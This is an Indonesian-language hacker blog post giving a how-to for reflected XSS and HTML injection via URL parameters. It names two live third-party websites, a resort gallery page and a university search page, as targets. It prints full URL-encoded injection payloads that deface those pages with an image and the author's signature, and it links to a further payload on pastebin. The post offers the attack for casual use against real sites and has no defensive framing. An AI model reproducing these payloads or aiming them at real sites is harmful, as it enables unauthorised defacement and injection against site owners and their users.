Yow Whatsapp guyss :v
Wellcome to My Blog xixix..
Nah kali akan membahas XSS pada parameter.
Biasanya Web berparameter vuln terhadap sqli(jika blom dipacth), nah sekarang gua bakal bagiin XSS dan HTML inject. Langsung kalian simak aja soalnya ezz gan :v
# Title: Switch Cross Site Scripting (XSS)
# date: 2020-05-23
# Vendor Homepage: Switch.sc and alert
# Tested on: Windows 7 & Google Chrome
# Vulnerable File: /gallery.php?img=
# My Payload : https://pastebin.com/TwQesM5Q
*Pake web vuln sqli juga bisa gan yang penting isi parameter xixi..

Live Target : http://www.sunresort.sc/en/gallery.php?img=1

Kalian masukan payloadnya.. dengan cara menghapus angka 1 dan memasukan payloadnya
Contoh :
http://www.sunresort.sc/en/gallery.php?img=%3Ccenter%3E%3Ctable%20height=%22400%22%20width=%22400%22%3E%20%3Ctd%20align=%22center%22%3E%20%3Cimg%20class=%22getar%22%20height=%22250%22%20src=%22https://l.top4top.io/p_1579fgyf30.jpeg%22/%3E%20%3Cb%3E%3Ci%3E%3Cbr%3E%3Cfont%20size=%225%22%20color=red%3ESuntik%20HTML%20%20by%20./Nararya%20A.K.A%20Reemar%20GARIS%20KERAS!.%3C/font%3E%3C/br%3E

http://www.stmik-time.ac.id/cari.php?txtcarikonten=%3Ccenter%3E%3Ctable%20height=%22400%22%20width=%22400%22%3E%20%3Ctd%20align=%22center%22%3E%20%3Cimg%20class=%22getar%22%20height=%22250%22%20src=%22https://l.top4top.io/p_1579fgyf30.jpeg%22/%3E%20%3Cb%3E%3Ci%3E%3Cbr%3E%3Cfont%20size=%225%22%20color=red%3ESuntik%20HTML%20%20by%20./Nararya%20A.K.A%20Reemar%20GARIS%20KERAS!.%3C/font%3E%3C/br%3E

Nah gampang kan temen temen :D
Ini Termasuk Bug XSS dan engga senua website berparaneter vuln XSS ini xixi..
Kalian bisa juga baca artikel lain hehehe :)
Referensi :
https://cxsecurity.com/issue/WLB-2020050186